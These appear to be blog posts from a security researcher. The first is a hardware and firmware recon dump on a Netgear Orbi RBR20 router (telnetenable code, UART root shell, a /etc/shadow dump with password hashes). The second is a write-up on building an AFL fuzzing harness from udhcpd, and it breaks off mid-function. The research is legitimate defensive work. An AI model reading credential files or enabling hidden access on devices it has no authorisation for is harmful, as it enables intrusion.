Minor disclaimer: This series of posts may be a bit disjointed and may not always provide much of a narrative. As mentioned above, it’s meant to be a data dump and not so much a walkthrough of every step I took along the way. Where possible I’ll provide context around how I came to certain conclusions, why I decided to look in a particular area, and any other information that I think may be useful to others.

Overview

System Details


  Device: Netgear Orbi (RBR20)
  Firmware Version(s):
    
      2.5.1.16 (Download)
      2.7.33 (Download)
    
  
  Architecture: ARMv7 rev 5
  Kernel: Linux RBR20 3.14.77 #2 SMP PREEMPT
  OS: Customized OpenWRT Chaos Calmer image


Hardware Details
Basic Specs

  Processor: Quad-Core ARM Cortex-A7, Qualcomm
  Memory: 1GB RAM
  Storage: 512MB NAND flash
  Radio: 2.4Ghz + 5Ghz wireless


Board Layout and Components

I took a look at the FCC listing for this particular device and reviewed the internal photographs, but soon discovered that the images didn’t exactly match my device: certain components were either different brands/models or missing entirely from the images compared to my actual device. In any case, this still provided a good point of reference for getting a general understanding of where things were supposed to be.

The top of the PCB exposes the following components:

  BLE + Wifi SoC
  CPU (beneath a shield)
  Voltage regulator
  RJ45 ports
  Power input
  UART pins


The bottom side of the PCB:


  Winbond NAND flash
  NANYA DRAM


 

Firmware Extraction

I used binwalk to extract the root filesystem from the firmware images provided by Netgear. This successfully extracted the embedded squashfs filesystem.
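
Conceptually, locating the embedded filesystem comes down to finding its signature inside the image. The sketch below is a deliberately simplified stand-in for that idea and not how binwalk is implemented: it only looks for the little-endian SquashFS magic `hsqs`, and it assumes the image uses that variant. The function name is hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Returns the offset of the first "hsqs" magic in buf, or -1 if absent. */
long demo_find_squashfs(const unsigned char *buf, size_t len)
{
    static const unsigned char magic[4] = { 'h', 's', 'q', 's' };

    for (size_t i = 0; i + sizeof(magic) <= len; i++) {
        if (memcmp(buf + i, magic, sizeof(magic)) == 0)
            return (long)i;
    }
    return -1;
}
```

A real tool also validates the superblock that follows the magic to weed out false positives before carving and unpacking anything.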

Below is a listing of the root directory from the extracted filesystem:

drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 __rd_debug_only
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 bin
-rw-r--r--  1 builder builder     9 Feb 13 00:47 cloud_version
drwxr-xr-x  3 builder builder  4096 Feb 13 02:20 data
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 dev
drwxr-xr-x 33 builder builder  4096 Feb 13 02:20 etc
-rw-r--r--  1 builder builder    11 Feb 13 00:47 firmware_language_version
-rw-r--r--  1 builder builder     1 Feb 13 00:47 firmware_region
-rw-r--r--  1 builder builder    29 Feb 13 00:47 firmware_time
-rw-r--r--  1 builder builder    10 Feb 13 00:47 firmware_version
-rw-r--r--  1 builder builder    11 Feb 13 00:47 flash_type
-rw-r--r--  1 builder builder    11 Feb 13 00:47 hardware_version
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 home -> /tmp
-rw-r--r--  1 builder builder    31 Feb 13 00:47 hw_id
drwxr-xr-x 18 builder builder  4096 Feb 13 02:20 lib
lrwxrwxrwx  1 builder builder     8 Feb 13 00:47 mnt -> /tmp/mnt
-rw-r--r--  1 builder builder     6 Feb 13 00:47 module_name
drwxr-xr-x  5 builder builder  4096 Feb 13 02:20 opt
lrwxrwxrwx  1 builder builder    12 Feb 13 00:47 overlay -> /tmp/overlay
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 proc
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 rom
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 root
drwxr-xr-x  3 builder builder 12288 Feb 13 02:20 sbin
drwxr-xr-x  2 builder builder  4096 Feb 13 00:47 sys
drwxr-xr-x  2 builder builder  4096 Feb 13 02:20 tmp
drwxr-xr-x  9 builder builder  4096 Feb 13 02:20 usr
lrwxrwxrwx  1 builder builder     4 Feb 13 00:47 var -> /tmp
drwxr-xr-x 14 builder builder 57344 Feb 13 02:20 www


GPL Code

Apart from the files from the extracted firmware images, I also downloaded the GPL code for each of the firmware versions I looked at. Download links for these packages can be found on this page for Netgear, though most vendors provide these packages as required by the license. They include the source for all GPL code the vendor used and/or modified to create the system.


  GPL Code for v2.5.1.16
  GPL Code for v2.7.33


The majority of the custom code/interesting files are located under the git_home directory of the extracted archive (which is an OpenWrt buildroot directory).

Note: While having vendors provide their modified code sounds great in theory, the reality is a little different. For example, the GPL packages for the Orbi include a lot of source code, but some of the open source applications they modified are provided in binary form only.




Firmware 2.5.1.16 vs. 2.7.33 Changes

There are a couple of important things that changed between these two firmware versions that I want to mention here.

(Easy) Telnet Access Removed

First, in the older version it was possible to enable Telnet access via the hidden debug page at http:///debug_detail.htm when logged in as the admin user. This was removed in the later version and it is no longer trivial to enable Telnet. There does appear to still be Netgear’s custom Telnet server telnetenable that listens on UDP port 23 and will only “activate” upon receiving a ‘magic’ packet containing username/pass and other info in a specific format (see here).

The code for this binary is included in the GPL packages. Version 2.5.x seems to have only allowed the use of this feature if the Region was set to Chinese and the Region file contained “WW” (shown below). The 2.7.x version doesn’t include this check and simply compares the received data against a local version it constructs (the main server loop is shown below):

	for (;;) {
		FD_ZERO(&readable);
		FD_SET(fd, &readable);

		if (select(fd + 1, &readable, NULL, NULL, NULL) < 1)
			continue;

		slen = sizeof(struct sockaddr_in);
		r = recvfrom(fd, rbuf, sizeof(rbuf), 0, (struct sockaddr *)&from, &slen);
		if (r < 1)
			continue;

		datasize = fill_payload(output_buf);
		if (r == datasize && memcmp(rbuf, output_buf, r) == 0) {
			/* maybe it's better to judge whether utelnetd is running in real time here */
			if (telnet_enabled == 0) {
				printf("The telnet server is enabled now!!!\n");
				system(TELNET_CMD);
				telnet_enabled = 1;
			}
			sendto(fd, ack, 3, 0, (struct sockaddr *)&from, slen);
		}
	}


Even so, I’ve yet to successfully enable Telnet even when using known-good credentials with either the telnet version linked above or my own customized version of the code included in the GPL packages.

Binaries in GPL Packages Stripped

The earlier version of the GPL code package provided binaries that had not been stripped of debug symbols, making reverse engineering of these specific applications much easier; the binaries in the later package are stripped. The unstripped ones are still useful for reversing newer binaries though, as most functions are still intact and knowing exactly what everything should be called always helps.

The paths to some of these binaries are provided here (these are paths on the root filesystem of the device):

/usr/sbin/net-cgi
/usr/sbin/soap-api
/usr/sbin/miniupnpd





UART Serial Console Access

After losing Telnet access when my device was unintentionally upgraded, I moved on to seeing if I could get access to a console over serial. My device still had pins connected as shown below, so this immediately caught my attention as being a potential serial interface. I found info online for other Orbi models that showed the correct pin layout.

Starting with the pin closest to the RJ45 port:


  GND, RX, TX, power (not needed)




I connected to these pins on the board using an FTDI serial-USB converter in the 3.3v configuration at 115200 baud (8N1) and successfully dropped into a root shell.
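
For anyone scripting the connection rather than using a terminal program, the line settings above map onto POSIX termios roughly as follows. This is a sketch, not something I ran against the device: the function name is hypothetical, and it only fills in a `struct termios` for 115200 baud, 8 data bits, no parity, 1 stop bit.

```c
#include <termios.h>

/* Fills tio with raw-mode 115200 8N1 settings. Returns 0 on success, -1 on error. */
int demo_config_115200_8n1(struct termios *tio)
{
    tio->c_iflag = 0;                       /* no input translation */
    tio->c_oflag = 0;                       /* no output translation */
    tio->c_lflag = 0;                       /* no echo, no line editing */

    tio->c_cflag &= ~(tcflag_t)(CSIZE | PARENB | CSTOPB);
    tio->c_cflag |= CS8 | CLOCAL | CREAD;   /* 8 data bits, ignore modem lines */

    tio->c_cc[VMIN] = 1;                    /* block until at least one byte */
    tio->c_cc[VTIME] = 0;

    if (cfsetispeed(tio, B115200) != 0)
        return -1;
    if (cfsetospeed(tio, B115200) != 0)
        return -1;
    return 0;
}
```

In use, you would `open()` the adapter's device node (for example `/dev/ttyUSB0`, which is an assumption about how the FTDI adapter enumerates), call `tcgetattr()`, pass the result through this function, and apply it with `tcsetattr(fd, TCSANOW, &tio)`.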

Bonus: GreatFET ONE UART Setup

After confirming this worked with the FTDI converter, I decided to use my GreatFET ONE board moving forward. This is an interesting hardware hacking tool I bought some time ago to begin experimenting with USB fuzzing/analysis. It allows for USB proxying and emulation of various USB devices (keyboard, storage, etc) through a programmatic interface using Python.

I remembered that it can also be used for serial/UART connections but had a difficult time finding any good documentation or examples of doing this. Eventually, I was able to get this working by connecting pins to the following ports on the GreatFET’s J1 bank of I/O pins (see full pin table here):


  1:GND
  33:RX
  34:TX


I then used the built-in UART script provided by the greatfet library/CLI tool:

greatfet uart --wait -P none -N





Recon Dump

boot log highlights

CPU Info:
Booting Linux on physical CPU 0x0
Linux version 3.14.77 (lijun.xue@cnshadnicp03.deltaos.corp) (gcc version 5.2.0 (OpenWrt GCC 5.2.0 r6043) ) #1 SMP PREEMPT Fri Jun 4 19:11:51 CST 2021
CPU: ARMv7 Processor [410fc075] revision 5 (ARMv7), cr=10c5387d
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine model: Qualcomm Technologies, Inc. IPQ40xx/AP-DK04.1-C1
PERCPU: Embedded 8 pages/cpu @dfbc7000 s8448 r8192 d16128 u32768
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 125952


Kernel memory layout:
Virtual kernel memory layout:
    vector  : 0xffff0000 - 0xffff1000   (   4 kB)
    fixmap  : 0xfff00000 - 0xfffe0000   ( 896 kB)
    vmalloc : 0xe0800000 - 0xff000000   ( 488 MB)
    lowmem  : 0xc0000000 - 0xe0000000   ( 512 MB)
    pkmap   : 0xbfe00000 - 0xc0000000   (   2 MB)
    modules : 0xbf000000 - 0xbfe00000   (  14 MB)
      .text : 0xc0208000 - 0xc073e1fc   (5337 kB)
      .init : 0xc073f000 - 0xc076a100   ( 173 kB)
      .data : 0xc076c000 - 0xc07abb38   ( 255 kB)
       .bss : 0xc07abb38 - 0xc0804680   ( 355 kB)
SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
Preemptible hierarchical RCU implementation.


System Users

root@RBR206:/# cat /etc/passwd
root:$5$BChRWDkyPlaOVrGS$/kQaqSCIWiiM36IuwS5phJHhpzdnP9osEVONs4CZa3C:0:0:root:/tmp:/bin/ash
guest:*:65534:65534:guest:/tmp/ftpadmin:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
admin:x:1:1:Linux User,,,:/tmp/ftpadmin:/bin/ash

root@RBR206:/# cat /etc/shadow 
guest::10957:0:99999:7:::
admin:$1$QPu5pxAi$ITZQ21EZg7P2B48TsiQwg1:18612:0:99999:7:::


Listening Processes (netstat -lp)

root@RBR20:/# netstat -lp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.13.13.1:7272         0.0.0.0:*               LISTEN      15890/circled
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      8278/lighttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      16137/dnsmasq
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      8278/lighttpd
tcp        0      0 :::www                  :::*                    LISTEN      8278/lighttpd
tcp        0      0 :::56688                :::*                    LISTEN      7298/miniupnpd
tcp        0      0 :::domain               :::*                    LISTEN      16137/dnsmasq
tcp        0      0 :::https                :::*                    LISTEN      8278/lighttpd
udp        0      0 10.13.13.1:38407        0.0.0.0:*                           7298/miniupnpd
udp        0      0 10.13.13.1:23           0.0.0.0:*                           12782/telnetenable
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           16137/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           2646/udhcpd
udp        0      0 0.0.0.0:tftp            0.0.0.0:*                           8334/tftpd-hpa
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           7298/miniupnpd
udp        0      0 0.0.0.0:45226           0.0.0.0:*                           5777/net-scan
udp        0      0 10.13.13.1:5351         0.0.0.0:*                           7298/miniupnpd
udp        0      0 :::domain               :::*                                16137/dnsmasq


Mount Points

root@RBR20:~# mount
rootfs on / type rootfs (rw)
/dev/root on /rom type squashfs (ro,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,noatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,noatime)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noatime)
overlayfs:/tmp/overlay on / type overlayfs (rw,relatime,lowerdir=/,upperdir=/tmp/overlay)
tmpfs on /dev type tmpfs (rw,nosuid,relatime,size=512k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600)
debugfs on /sys/kernel/debug type debugfs (rw,noatime)
ubi0:vol_ntgr on /tmp/mnt/ntgr type ubifs (rw,relatime)
ubi0:vol_arlo on /tmp/dal type ubifs (rw,relatime)
ubi0:vol_devtable on /tmp/device_tables type ubifs (rw,relatime)
ubi0:vol_circle on /tmp/mnt/circle type ubifs (rw,relatime)


Web Servers

Web servers will be discussed in further detail in a future post but for now I’ll just cover some of the basics.

The following binaries provide an HTTP server or are otherwise involved in handling HTTP-formatted requests.

/usr/sbin/lighttpd
/usr/sbin/net-cgi
/usr/sbin/soap-api
/www/cgi-bin/proccgi



  lighttpd is the main user-facing web server process that handles requests; it mostly wraps around net-cgi
  net-cgi handles the bulk of admin functionality that reads underlying system configs and makes config changes
    
      net-cgi responses are typically embedded within responses returned by lighttpd within iframes or as raw data written back to the FD.
    
  
  soap-api is the binary called by the CGI handler to handle SOAP requests. All requests to /soapapi.cgi or /soap/server_sa are routed to this binary. It is a CGI application that reads most of the request data from environment variables (it expects the parent process to set all of this up prior to spawning soap-api).
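
As a reminder of what "reads the request from environment variables" looks like in a CGI program, here is a minimal sketch using the standard CGI variable `CONTENT_LENGTH`. It is not taken from soap-api, and I am not claiming soap-api reads this particular variable this way; the function name is hypothetical.

```c
#include <errno.h>
#include <stdlib.h>

/* Returns CONTENT_LENGTH as a non-negative number, or -1 if unset or malformed. */
long demo_cgi_content_length(void)
{
    const char *raw = getenv("CONTENT_LENGTH");
    char *end = NULL;
    long value;

    if (raw == NULL || *raw == '\0')
        return -1;

    errno = 0;
    value = strtol(raw, &end, 10);
    if (errno != 0 || *end != '\0' || value < 0)
        return -1;          /* overflow, trailing junk, or negative length */
    return value;
}
```

This also means a CGI binary can be exercised on its own by setting the expected variables and feeding the request body on stdin, with no web server involved.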


Only the following pages are accessible prior to authentication:

/unauth.cgi
/passwd_reset.cgi
/basic_home_result.txt
/debuginfo.htm





Wrapping Up
Okay, that was a ton of info.

As mentioned above, future posts will dive deeper into specific areas of interest and include some of my findings in these areas.

References


  netgear-telnetenable Python script
  Orbi RBR20 FCCID.io page
  Netgear GPL Downloads page
  GreatFET One



fuzzing udhcpd: a hacky approach
2022-06-05T00:00:00+00:00
I wanted to do some fuzzing against udhcpd recently but was feeling too lazy to write a harness from scratch, so instead modified the existing udhcp server code to turn it into a harness using AFL’s LLVM persistent mode and then modified the udhcp client (udhcpc) to generate a corpus of testcases and write them out to files. Here’s what I was able to put together over a weekend.

Introduction
I’ve been looking at a router on and off for a little over a year now and recently began looking at fuzzing some of the code for exposed services, one of them being DHCP. As DHCP is reachable pre-auth, I was interested in seeing whether there may be any bugs that could be triggered via DHCP messages. Specifically, I wanted to use AFL to fuzz the functions that parsed/handled DHCP client messages. For the first run, I focused on DHCPDISCOVER messages.

This post will go over an idea I had for how to create a custom fuzzing harness and the steps I took to get everything working. This includes:




  Create a fuzzing harness from the udhcpd server code using AFL’s LLVM persistent mode fuzzing feature
  Generate a fuzzing corpus using the udhcpc client code to produce dhcpMessage data and write it to files


Disclaimer: this post contains 0 0days. Sorry!

A Hacky(?) Approach

Before I could get started I needed to figure out how to create a harness that I could use to fuzz the target functions with AFL, which isn’t designed to do network-based fuzzing. There are forks of AFL that do support network fuzzing, but I hadn’t looked into them much and I had an idea for how I might be able to do it that would allow me to remove the socket binding entirely.

The idea was basically this:


  Create a modified version of the udhcp client code (udhcpc) to generate valid DHCP message packets and write the raw bytes of the data structures to files
  Create a modified version of the udhcp server code (udhcpd) that reads packet data from the output files instead of from the network and then enters a fuzzing loop where that seed data is continuously mutated and resubmitted for fuzzing


I chose to use AFL’s persistent mode feature since it would allow me to target only the code used to handle DHCPDISCOVER messages and would improve overall performance. This also fit perfectly for my idea since persistent mode does almost exactly what I wanted (enter a fuzzing loop to target specific functions). You can learn more about persistent mode here.

Dev Setup

Below are the details for the working environment and tools I used throughout the development of the project:


  OS: Ubuntu Server 20.04 VM
  Specs: 8 cores, 16GB RAM (you definitely don’t need this to just build the code but it helps for the actual fuzzing part!)
  Tools: Docker, vim, AFL++


For simplicity’s sake, I chose to use the AFL++ docker container rather than go through the setup needed to install the necessary LLVM/Clang versions required for AFL’s persistent mode. This offers a fully functional working environment where you can easily mount your target source code and compile with the desired instrumentation.

docker run -ti -v $PWD:/src aflplusplus/aflplusplus


About udhcp

This application is now built directly into Busybox, but used to be distributed as a standalone application that provides both server and client functionality. The router in question is running a modified version of udhcpd version 0.9.8. I was able to get the source code for the modified version but couldn’t get it to build so I just went with the vanilla source downloaded from here.

Code Review

I began by reviewing the code in dhcpd.c to identify where handling of DHCPDISCOVER messages was being done and to get a feel for how the code worked. dhcpd.c is a relatively small file (less than 300 LOC) and the main function contains entry points for handling every type of DHCP client message.

The code begins by declaring and initializing some variables and then loading the server configuration from a config file:

memset(&server_config, 0, sizeof(struct server_config_t));
	
	if (argc < 2)
		read_config(DHCPD_CONF_FILE);
	else read_config(argv[1]);


After this the code does some more initialization of variables and server config values from the parsed config file and then enters the main server loop that handles receiving packets for processing. The capture of packets is done by get_packet() in the following code, which parses the packet into a dhcpMessage struct called packet:

if ((bytes = get_packet(&packet, server_socket)) < 0) { /* this waits for a packet - idle */
			if (bytes == -1 && errno != EINTR) {
				DEBUG(LOG_INFO, "error on read, %s, reopening socket", strerror(errno));
				close(server_socket);
				server_socket = -1;
			}
			continue;
		}


Immediately after this, the code parses the DHCP message type from packet and saves it to state:

if ((state = get_option(&packet, DHCP_MESSAGE_TYPE)) == NULL) {
			DEBUG(LOG_ERR, "couldn't get option from packet, ignoring");
			continue;
		}
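
For readers unfamiliar with the options field, the lookup boils down to walking a list of code/length/value entries. The sketch below is a simplified illustration of that walk and not udhcp's `get_option()` (which, among other things, works on the whole `dhcpMessage`). The names are hypothetical; the option codes are the standard DHCP ones (pad = 0, message type = 53, end = 255).

```c
#include <stddef.h>
#include <stdint.h>

#define DEMO_OPT_PAD      0x00
#define DEMO_OPT_MSG_TYPE 0x35  /* option 53: DHCP message type */
#define DEMO_OPT_END      0xff

/* Returns a pointer to the data of the first option matching code, or NULL. */
const uint8_t *demo_get_option(const uint8_t *opts, size_t len, uint8_t code)
{
    size_t i = 0;

    while (i < len) {
        uint8_t cur = opts[i];

        if (cur == DEMO_OPT_END)
            return NULL;
        if (cur == DEMO_OPT_PAD) {      /* pad has no length byte */
            i++;
            continue;
        }
        if (i + 1 >= len)               /* length byte is missing */
            return NULL;

        size_t optlen = opts[i + 1];
        if (optlen > len - (i + 2))     /* data would run past the buffer */
            return NULL;
        if (cur == code)
            return &opts[i + 2];
        i += 2 + optlen;
    }
    return NULL;
}
```

For a DHCPDISCOVER the message type option carries the single byte 1. The bounds checks here are exactly the kind of logic a fuzzer is good at stressing in the real parser.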


The value saved to state is then used in a switch statement with cases for handling each type of DHCP message. This is where the handling for DHCPDISCOVER is defined, which calls a single function, sendOffer(), passing in packet as an argument:

switch (state[0]) {
		case DHCPDISCOVER:
			DEBUG(LOG_INFO,"received DISCOVER");
			
			if (sendOffer(&packet) < 0) {
				LOG(LOG_ERR, "send OFFER failed");
			}
			break;
		<--- snip --->
}


With all of this in mind, I made the following determinations:


  The testcase data would need to be read/parsed into a dhcpMessage struct so that it can be passed to the target function
  The target function would be sendOffer()
  The best place to insert the fuzzing loop would be right before entering the switch block that checks the DHCP message type





Creating the Harness

To get started, I created a copy of the original dhcpd.c file that I would use to create the harness.

Server Configuration and Initialization

Most of the original code that handles the reading of the config file, initialization of the server_config global structure, memory allocation for leases, and reading of the network interface for more server_config initialization was left as-is except for some minor changes (shown here):

  // read config file into server_config global
	memset(&server_config, 0, sizeof(struct server_config_t));
	read_config("./test-udhcpd.conf"); // edit: hardcode the config file name

	pid_fd = pidfile_acquire(server_config.pidfile);
	pidfile_write_release(pid_fd);
  server_config.lease = LEASE_TIME; // edit: always use default lease time
	
	// allocate mem for leases and read from lease file
	leases = malloc(sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
	memset(leases, 0, sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
	read_leases(server_config.lease_file);

	if (read_interface(server_config.interface, &server_config.ifindex,
			   &server_config.server, server_config.arp) < 0)
		return 1;


As shown above, the harness is hardcoded to search for a config file named test-udhcpd.conf in the local working directory. Below is a minimal configuration file used for the harness (the start/end values and the interface must match the actual network configuration of the host where the harness will run):

start 		172.0.2.10	  #default: 192.168.0.20
end		    172.0.2.20	  #default: 192.168.0.254
interface	eth0		      #default: eth0
opt	dns	  192.168.10.2 192.168.10.10
option subnet	255.255.255.0
opt	router	172.0.2.1
option	  domain	local
option	  lease	864000		# 10 days of seconds


Inserting the Persistent Mode Fuzzing Loop

I then replaced the infinite server loop (while (1)) with the main AFL fuzzing loop (while (__AFL_LOOP())). Since testcase data was going to be passed in via input files, there was no need to have the server bind to a socket and actually listen for packets, so I removed the majority of the server networking code from the start of the main loop.

I replaced this code with the code needed to reset state, read the testcase data into a dhcpMessage structure, and call the target function. Specifically, this code does the following:


  Zeroes out the leases buffer and reinitializes it by calling read_leases() to ensure each loop iteration starts with the same state
  After a sanity check of the testcase buffer size, zeroes out the dhcpMessage struct that will hold the testcase data (fuzz_packet) and copies the data into it using memcpy
  Reads the DHCP message type from fuzz_packet and saves it to state. If no valid message type is found we continue to the next testcase; otherwise the original switch block from the server code is entered with a single case to match DHCPDISCOVER messages
  Passes the fuzz data in fuzz_packet to sendOffer()


The final code within the fuzzing loop is shown below:

int main(int argc, char *argv[])
{	

  [... SNIP ...]

	// START AFL LOOP
		__AFL_INIT();

		unsigned char *aflbuf = __AFL_FUZZ_TESTCASE_BUF; // afl will automatically read the file data into this buf
	
		while (__AFL_LOOP(10000000)) {
			// reset leases at the start of each run
			memset(leases, 0, sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
			read_leases(server_config.lease_file);
			
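			// check len is good (the cast avoids a signed/unsigned comparison)
			ssize_t afllen = __AFL_FUZZ_TESTCASE_LEN;
			if (afllen < 0 || (size_t)afllen > sizeof(struct dhcpMessage)) continue;
	
			struct dhcpMessage fuzz_packet;
			memset(&fuzz_packet, 0, sizeof(struct dhcpMessage));
			// copy only the bytes AFL provided; the rest of the struct stays zeroed
			memcpy(&fuzz_packet, aflbuf, (size_t)afllen);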
	
			if ((state = get_option(&fuzz_packet, DHCP_MESSAGE_TYPE)) == NULL) {
				continue;
			}

			lease = find_lease_by_chaddr(fuzz_packet.chaddr);
			
			// Pass the testcase data to the target functions based on message type
			switch (state[0]) {
				case DHCPDISCOVER:
					if (sendOffer(&fuzz_packet) < 0) {
						printf("send OFFER failed");
					}
					break;
				default:
					continue;
			}
		}
	return 0;
}
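
One detail worth isolating in a harness like this is the step that turns a variable-length testcase into a fixed-size struct. The sketch below shows one way to keep the length check and the copy together so that short inputs never pull in stale bytes. `struct demo_msg` is a hypothetical stand-in for `struct dhcpMessage` (the real struct has many more fields), and the helper name is made up.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical, much smaller stand-in for struct dhcpMessage. */
struct demo_msg {
    unsigned char op;
    unsigned char options[16];
};

/*
 * Copies a testcase of len bytes into dst.
 * Returns 0 on success, -1 if the testcase is larger than the struct.
 * Bytes beyond len are left zeroed so every run starts from a known state.
 */
int demo_load_testcase(struct demo_msg *dst, const unsigned char *buf, size_t len)
{
    if (len > sizeof(*dst))
        return -1;

    memset(dst, 0, sizeof(*dst));
    memcpy(dst, buf, len);      /* copy exactly what the fuzzer provided */
    return 0;
}
```

Copying only `len` bytes matters for reproducibility: if the copy always used the full struct size, a short testcase would be padded with whatever the fuzzer's shared buffer held from a previous iteration.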




Generating Testcases

Next, I had to figure out a way to generate testcases and write them out to files to make them readable by AFL, since this is how it’s designed to read inputs. To accomplish this I used the DHCP client code included with udhcp to generate valid dhcpMessage structures and write the raw bytes out to disk.

Creating Packets

The majority of the client components are located in dhcpc.c and clientpacket.c. Upon reviewing the code, I found that dhcpMessage objects are initialized with the function init_packet(); this function is called by other higher-level functions used to create specific types of DHCP messages (send_discover(), send_renew(), etc). Below is an example of one of these functions, used to send DHCP Discover messages:

/* Broadcast a DHCP discover packet to the network, with an optionally requested IP */
int send_discover(unsigned long xid, unsigned long requested)
{
	struct dhcpMessage packet;

	init_packet(&packet, DHCPDISCOVER);
	packet.xid = xid;
	if (requested)
		add_simple_option(packet.options, DHCP_REQUESTED_IP, requested);

	add_requests(&packet);
	LOG(LOG_DEBUG, "Sending discover...");
	return raw_packet(&packet, INADDR_ANY, CLIENT_PORT, INADDR_BROADCAST, 
				SERVER_PORT, MAC_BCAST_ADDR, client_config.ifindex);
}


This actually made things incredibly easy: all I had to do was make modified copies of these higher-level functions that I could use to generate mutated packets and write them to files. I made a new file in the source directory for the testcase generator and copied over the relevant code from dhcpc.c and clientpacket.c. I won’t post the code for every modified function to keep things readable, but below is an example of the modified version of the send_discover() function shown in the code block above.

/* Broadcast a DHCP discover packet to the network, with an optionally requested IP */
static void make_discover(struct dhcpMessage *packet, unsigned long xid, unsigned long requested)
{
	printf("debug - discover start\n");
	init_packet_fuzz(packet, DHCPDISCOVER);
	packet->xid = xid;
	if (requested) {
		printf("requested ip\n");
		add_simple_option(packet->options, DHCP_REQUESTED_IP, requested);
	}

	add_requests_fz(packet);
	printf("debug - add_req finished\n");

	// EDIT: removed the code that sends the packet over the network
	// return raw_packet(&packet, INADDR_ANY, CLIENT_PORT, INADDR_BROADCAST,
	//			SERVER_PORT, MAC_BCAST_ADDR, client_config.ifindex);
}


For each of these functions, I removed the calls to raw_packet() that were present in the originals; this function takes care of adding IP/UDP headers to the packet and actually sending the packet over the network. Apart from the fact that we don’t actually need to send any packets since we intend to write them out to files, we also don’t need to add IP/UDP headers since the target function sendOffer() expects to receive a parsed dhcpMessage struct which has already been read from the socket and stripped of the encapsulating layer. Instead, each of these functions just returns after initializing the packet arg (this is passed by reference, so the calling function has the pointer to packet).
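
To make "a dhcpMessage with no encapsulating headers" concrete, here is a rough Python sketch of what such a testcase looks like as raw bytes. The field layout is my reading of udhcp's struct dhcpMessage (a fixed BOOTP header, the magic cookie, then a 308-byte options area) and should be treated as an assumption, as should the build_discover() helper, which is purely illustrative. For simplicity the sketch packs every multi-byte field in network byte order, whereas the C generator writes the struct exactly as it sits in memory.

```python
import struct

# Assumed layout of udhcp's struct dhcpMessage. "!" = network byte order, no padding.
DHCP_MESSAGE = struct.Struct("!BBBBIHHIIII16s64s128sI308s")
DHCP_MAGIC = 0x63825363      # standard DHCP magic cookie
DHCP_MESSAGE_TYPE = 53       # option code carrying the message type
DHCPDISCOVER = 1
DHCP_END = 0xFF              # end-of-options marker


def build_discover(xid, mac):
    """Return the raw bytes of a minimal DHCPDISCOVER with no IP/UDP headers."""
    options = bytes([DHCP_MESSAGE_TYPE, 1, DHCPDISCOVER, DHCP_END])
    return DHCP_MESSAGE.pack(
        1,            # op: BOOTREQUEST
        1,            # htype: Ethernet
        6,            # hlen: length of a MAC address
        0,            # hops
        xid,
        0, 0,         # secs, flags
        0, 0, 0, 0,   # ciaddr, yiaddr, siaddr, giaddr
        mac,          # chaddr, zero-padded to 16 bytes by struct
        b"", b"",     # sname, file
        DHCP_MAGIC,
        options,      # zero-padded to 308 bytes by struct
    )


packet = build_discover(0x12345678, bytes.fromhex("0242ac110002"))
print(len(packet))
```

Under these assumptions every testcase is the same fixed size, which is what lets the harness read a file straight into a struct dhcpMessage without any parsing.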

I also created a couple of customized versions of the init_packet() function that would allow me to easily pass in custom values for fields I might want to focus on. For example, I created a version that would allow me to pass in a custom length value for the vendor_id that’s added to the packet using add_option_string():

static void init_packet_long_vendor_str(struct dhcpMessage *packet, char type, unsigned int fuzz_length)
{
	struct vendor  {
		char vendor, length;
		char str[sizeof("udhcp")];
	} vendor_id = { DHCP_VENDOR,  (sizeof("A") * fuzz_length) - 1, "udhcp"};
	
	init_header(packet, type);
	memcpy(packet->chaddr, client_config.arp, 6);
	add_option_string(packet->options, client_config.clientid);
	if (client_config.hostname) add_option_string(packet->options, client_config.hostname);
	add_option_string(packet->options, (unsigned char *) &vendor_id);
}


Handling the Client Configuration

With the modified functions in place, I then moved onto main(), which is where I would call these customized functions to create the testcase files. The original main() begins by parsing command-line arguments for configuration options and initializing a global client_config struct. As is probably obvious, this contains the various configuration values used by the DHCP client, and a lot of the code reads from this data structure.

I wanted to be sure this got properly initialized but didn’t want to have to pass in command-line arguments, so I created the following function using the same code from the original main() but modified to only initialize the important config values needed for my purposes.

static void create_fuzz_client_config(char *hostname, char *interface, char *client_id)
{
    // set the client ID
    int len = strlen(client_id) > 255 ? 255 : strlen(client_id);
    if (client_config.clientid) free(client_config.clientid);
    client_config.clientid = xmalloc(len + 2);
    client_config.clientid[OPT_CODE] = DHCP_CLIENT_ID;
    client_config.clientid[OPT_LEN] = len;
    client_config.clientid[OPT_DATA] = '\0';
    strncpy(client_config.clientid + OPT_DATA, client_id, len);

    // set the hostname
    len = strlen(hostname) > 255 ? 255 : strlen(hostname);
    if (client_config.hostname) free(client_config.hostname);
    client_config.hostname = xmalloc(len + 2);
    client_config.hostname[OPT_CODE] = DHCP_HOST_NAME;
    client_config.hostname[OPT_LEN] = len;
    strncpy(client_config.hostname + 2, hostname, len);

    // set the network interface
    client_config.interface = interface;
}


Finally, I created a small function to handle the actual writing of the packet data to disk:

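int write_packet_to_testcase_file(struct dhcpMessage *packet, char *type_prefix) {
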